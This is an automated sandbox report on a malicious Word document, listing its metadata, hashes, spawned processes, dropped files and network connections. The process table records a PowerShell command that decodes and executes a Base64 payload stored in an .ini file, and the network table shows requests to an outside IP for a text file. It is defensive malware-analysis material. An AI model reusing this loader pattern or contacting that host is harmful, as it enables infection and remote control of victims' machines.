download: | 0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad |
Full analysis: | https://app.any.run/tasks/c81adfe4-fe83-42bc-92a1-70c0483892d6 |
Verdict: | Malicious activity |
Analysis date: | May 15, 2019, 09:45:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Babak Amiri, Template: Normal, Last Saved By: jack, Revision Number: 19, Name of Creating Application: Microsoft Office Word, Total Editing Time: 33:00, Create Time/Date: Tue Apr 23 22:18:00 2019, Last Saved Time/Date: Thu May 2 15:26:00 2019, Number of Pages: 1, Number of Words: 118, Number of Characters: 678, Security: 0 |
MD5: | 036F4400BABDAA314AB5AA4A2C378E2F |
SHA1: | 319CBD82A2B64BDA4715F9690E2E02EDBDB076F0 |
SHA256: | 0F3CABC7F1E69D4A09856CC0135F7945850C1EB6AEECD010F788B3B8B4D91CAD |
SSDEEP: | 6144:nxgVouPfhvgAQB2QGVofCleAwZnNc+Q3sSB2LljR02VS:xgVoQhoAQoIfClb2nQ3DmjTVS |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 795 |
Paragraphs: | 1 |
Lines: | 5 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 678 |
Words: | 118 |
Pages: | 1 |
ModifyDate: | 2019:05:02 14:26:00 |
CreateDate: | 2019:04:23 21:18:00 |
TotalEditTime: | 33.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 19 |
LastModifiedBy: | jack |
Template: | Normal |
Comments: | - |
Keywords: | - |
Author: | Babak Amiri |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3376 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2648 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 3221225786 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2736 | "C:\Windows\regedit.exe" | C:\Windows\regedit.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Editor Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3528 | "C:\Windows\regedit.exe" | C:\Windows\regedit.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Editor Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2544 | "C:\Windows\System32\cmd.exe" | C:\Windows\System32\cmd.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1928 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREE83.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF7A98D2E3D1388CB5.TMP | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CEYBVOR97RK7JYWQPVUK.temp | — | |
MD5:— | SHA256:— | |||
3376 | WINWORD.EXE | C:\Users\admin\Desktop\~$3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad.doc | pgc | |
MD5:05E40F81265F95F5F7EAD33F1EFF3F62 | SHA256:359400D93378BA4E0C40249A107AF9E0542181873DA06E18B012616A1EA147A3 | |||
3376 | WINWORD.EXE | C:\Users\admin\Desktop\0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad.doc | document | |
MD5:2180643CEE008A67C6E2D89A235C5800 | SHA256:777003C0361353B37CEDAE377D6EB4B87693B3B1DF895F9EE22D01D2BEA51E37 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1DBF94C52019F3FA68C5F190CC8E718C | SHA256:D3BE336F578B31B1E3E6BD5ABD73B111AB652DB1A9E30959ED3E7F3480EC098E | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad.doc.LNK | lnk | |
MD5:8748AAE709AB1FB1A7AF888CCB724BFA | SHA256:3F1DFEF6458913BF33C2B495A7DA067175216CCB405E2E4CCE66BD8BDB07285D | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:358CBFEB32E53F906502BC1377A1F64D | SHA256:B3735A5C81D001635DB72D1BCE98A411B19A08C514379E05FB0F7C7EB2EB94FB | |||
3376 | WINWORD.EXE | C:\Users\admin\Desktop\~WRD0000.tmp | document | |
MD5:924E138192609FA03B84802D3CEBF78C | SHA256:495A2CF2C761D40CA6D961CB27F418944C17D0350F597B0306083FF3FB2B365C | |||
1928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:CFCC2302AE96577C0F000A7AE3D87EBD | SHA256:C9A01D9A29ADF26A17994352A90FB28871F2FF1CB9FE7FB61664433D42BF0BF8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1928 | powershell.exe | GET | — | 38.132.99.167:80 | http://38.132.99.167/crf.txt | US | — | — | suspicious |
1928 | powershell.exe | GET | — | 38.132.99.167:80 | http://38.132.99.167/crf.txt | US | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 38.132.99.167:80 | — | M247 Ltd | US | suspicious |